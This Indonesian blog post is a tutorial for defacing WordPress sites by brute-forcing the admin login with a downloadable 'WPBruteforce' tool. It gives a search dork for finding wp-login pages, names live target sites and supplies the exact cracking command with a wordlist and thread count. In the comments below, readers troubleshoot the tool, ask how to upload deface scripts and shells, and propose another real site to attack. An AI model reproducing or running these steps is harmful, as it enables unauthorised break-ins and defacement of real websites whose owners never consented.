Cara Mudah Deface Wordpress Site Dengan WP Bruteforce


UPDATE: Link sudah diperbaiki... :)

Salam Sobat,, ;)


Hajiahh,, dini hari kagak ngapa2in neh, ga bisa tidur :3 tapi ga apa apa dah, setidaknya bisa membuat Tutorial yang berguna buat sobat semua ^_^ langsung dah disimak yooo.. ;)

Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Pertama Download Bahan-Bahannya:

WPBruteforce


Password: http://indocyberarmy.blogspot.com

Dork: inurl:/wp-login.php

Yup, saatnya kita beraksi.. :)

Live Target: http://live-target.pusku.com/

Pertama, Extract File yg didownload tadi di Directori C: sehingga posisi menajdi C:\WPBrute


Lalu buka comand dengan cara : Klik Start>Run>ketik cmd


Biasanya posisi default directories di Cmd : C:\User\User_Name>
Ubah posisi directori dgn cara: ketik cd.. trus enter!

ex:
C:\User\User_Name>cd..
C:\User>cd..
C:\>
 Lalu  setelah itu masukkan perintah C:\>cd WPBrute lalu tekan enter! 



Buka file dengan mengetik perintah: WPBorce.exe maka Akan muncul tampilan seperti gambar!


Lalu masukkan perintah: WPBforce.exe -url=http://www.tvbba.nl -user=admin -pass=wordlist.txt -threads=10



Lalu tekan enter!

Tunggu proses hingga selesai!



Wew! Berhasil tuh! wkwkwk Mantap! :p

Langsung Login dah!




GoodLuck!! :D

Content Created By Onix AQua


tag : cara deface wordpress, brute attack wordpress, deface website mudah

Post a Comment

68 Comments

  1. om.,.
    gak bisa
    gagal trus waktu d scan

    ReplyDelete
  2. bro koq ada tulisan [ERRO] Arquivo de WordList nao existe!
    gmana tolong bantu

    ReplyDelete
  3. WPBrute.exe nya kg bisa di buka =="

    ReplyDelete
  4. Cara ini tidak mungkin bisa di pakai.
    Ini hanya program random password sederhana. Tidak mengecek ke serverweb.

    ReplyDelete
    Replies
    1. bisa om,, tergantung ma wordlist passwordnya... :D

      Delete
    2. kemgkinan bisa nya kecil apa lagi di liat dari tutorial ni lama bgt pasti cara pncegahan jg udh byk beredar
      aplikasi cuma nebak 1per1 user_id dan password sesuai isi wordlist
      bkan mencari tau password sbenarnya

      Delete
  5. Oh. onix yang ngurus blog ini, perasaan pernah denger ._.
    mau nanya..


    jelasin dong yg tiga dibawah ini
    "-user=admin -pass=wordlist.txt -threads=10"

    apakah ini fix, atau perlu diganti2? .__.

    ReplyDelete
  6. Buka file dengan mengetik perintah: WPBorce.exe maka Akan muncul tampilan seperti gambar!

    yg diatas ane bingung -_-

    ReplyDelete
  7. Buka file dengan mengetik perintah: WPBorce.exe maka Akan muncul tampilan seperti gambar!

    yg diatas ane bingung -_-

    ReplyDelete
  8. Om klo settingan CMDnya kyk gini gimana?
    C:\Documents and Settings\UserXP>
    saya coba terus cd.. kaga bisa adanya yg muncul
    The System Cannot Find The Path Specified.
    lalu saya juga coba langsung
    C:\Documents and Settings\UserXP>cd.. WPBrute
    kaga bisa jga bro yg muncul sm jga bro The System .....

    ReplyDelete
    Replies
    1. klo ga bsa di C:\ gunakan partisi yg lain, misal D:\
      letakkan file di D:\ dan di terminal utk pindah partisi cukup ketik D: lalu enter.. :)

      Delete
  9. long live for you

    ReplyDelete
  10. Kalo cara jahil nya udah di jelaskan disini, nah.. bagaimana dengan langkah cara pencegahan bagi teman2 yang menggunakan WP sebagai CMS websitenya. Mengingat WP adalah salah satu cms favorit anak2 indonesia.

    ditunggu sharing berikutnya bro.

    ReplyDelete
    Replies
    1. pencegahannya simple aja kok om, gunakan password dengan kombinasi yg sangat rumit.. :D

      mksih udah mampir om :D

      Delete
  11. Omm...
    Waktu d Scan kok ada bacaan "wordpress nao foi detectado" itu gimana gan??

    ReplyDelete
  12. gan...
    kok dari notepad pas ane download wpbrute nya???
    emang notepad(default) ya?

    ReplyDelete
  13. pas buka CMD tampilannya bukan kaya gini
    ex:
    C:\User\User_Name>cd..
    C:\User>cd..
    C:\>

    jadi bingung caranya gimana

    ReplyDelete
  14. ndownload WPBruteforcenya bingung gan

    ReplyDelete
  15. link WPBruteforce-nya expired gan

    ReplyDelete
  16. password nya apa itu ?? :>)

    ReplyDelete
  17. Om link nya mati ;((

    ReplyDelete
  18. mangstap ane coba dolo ya 8-)

    ReplyDelete
  19. Blog yg BERMUTU !!!cara ganti link target gmna om ?it dah standarkah ? 8-)

    ReplyDelete
  20. wedew,,,No consequiu craquerar!!! ;((

    ReplyDelete
  21. Ane Coba dulu omm x-) semoga berhasil :-b :))

    ReplyDelete
  22. ex:
    C:\User\User_Name>cd..
    C:\User>cd..
    C:\>cd WPBrute
    C:\WPBrute>cd WPBrute
    C:\WPBrute\WPBrute>WPBforce.exe
    biar bs.. :-b :-b

    ReplyDelete
  23. lama bnar scannya gan,,,,,,,,, x-)

    ReplyDelete
  24. eh papa onix :-) dicariin mama Cut tuh :>)

    ReplyDelete
  25. C:\User\User_Name>cd..
    C:\User>cd..
    C:\>cd


    kalo pada bingung pake cara diatas, ada cara yang lebih simple kok buat buka WPBforce-nya.
    >> Buka folder WPBorce
    >> tekan SHIFT + Klik Kanan secara bersamman ke isi folder (jangan nyentuh file ya :-) )
    >> klik yang tulisannya "open command windows here"
    >> step terakhir, ketik WPBforce.exe
    >> Happy hacking guys! :-d

    ReplyDelete
  26. Om Onix itu ada kesalah kecil dalam penulisan yang ini :
    -Buka file dengan mengetik perintah: WPBorce.exe maka Akan muncul tampilan seperti gambar!
    seharusnya
    - Buka file dengan mengetik perintah: WPBforce.exe maka Akan muncul tampilan seperti gambar!
    .. Hanya kurang huruf f

    ReplyDelete
  27. belum pernah tembus :D

    [ERRO] Wordpress Nao Foi Detectado

    pencerahan nya bang :D

    ReplyDelete
    Replies
    1. itu wordpressnya berarti gak Vuln gan :v

      Delete
  28. All Kalau Mau Ngeliatnya Make Beginian

    wordlist.txt -_-

    ReplyDelete
  29. Gan Onix gmn masukin scip deface tampilannya ke websitenya?????????? (m)

    ReplyDelete
  30. untuk perintah yg terakhir, jika si empunya web ngasih usernya bukan admin, apa masih bisa perintah -user:admin dipake? wordpress sekarang kan pas pertama instalasi bisa ngisi user untuk admin nya mau apa aja bebas, tidak harus admin.

    ReplyDelete
    Replies
    1. ada 1 web yg pengen aku uprek2, http://www.gebyarpoin777.com/ udah banyak orang yg ketipu. ane cuma ingin mengurangi jumlah orang yg tertipu aja.

      Delete
  31. gan kalau gini gimana gan http://prntscr.com/215spc
    dan satu lagi apakah ada dork selain dork itu ?

    ReplyDelete
  32. bang klo mau ganti indexnya gimana? :d

    ReplyDelete
  33. mm...
    Waktu d Scan kok ada bacaan "wordpress nao foi detectado" itu gimana gan??
    balas yah om...!!!!!?????

    ReplyDelete
  34. @-) Klo Selain Wordprees Misalnya Blogspot Bisa Kga :-s

    ReplyDelete
  35. Bang Tanya cara tampilin shellnya di firefox gmana gan ? ane newbie banget

    ReplyDelete
  36. ini knp sob ? udh coba WPBforce.exe -url= -user -pass blablbalba trs kok gini? " 'WPBforce.exe' is not recognized as an internal or external command,operable program or batch file. " http://prntscr.com/2rqop5

    ReplyDelete
  37. pass nya apa? idca kgk bsa :/

    ReplyDelete
  38. om mau nanya,, waktu scan kok aq error ya..?? itu kenapa

    ReplyDelete
  39. wordlistnya kurang banyak gans

    ReplyDelete
  40. ini cuma yang nama usernamenya : admin
    kalau username lain gak bisa,

    intinya aplikasi ini buat nebak password, username pikirin sendiri

    ReplyDelete
  41. Laptop jadi Hangus gara gara Panas nya super over Heating Jebol dah HDD guaa ;((

    ReplyDelete